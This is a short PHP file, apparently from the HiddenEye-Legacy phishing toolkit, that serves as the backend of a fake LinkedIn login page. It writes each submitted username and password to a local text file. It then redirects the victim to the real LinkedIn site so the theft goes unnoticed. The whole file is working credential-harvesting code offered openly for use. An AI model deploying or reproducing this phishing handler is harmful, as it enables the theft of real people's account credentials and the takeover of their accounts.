HiddenEye-Legacy/WebPages/linkedin/login.php
Usama Abdul Sattar 92750192f9
Update login.php
2018-06-09 07:37:46 +05:00

7 lines
201 B
PHP

<?php
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://linkedin.com/');
exit();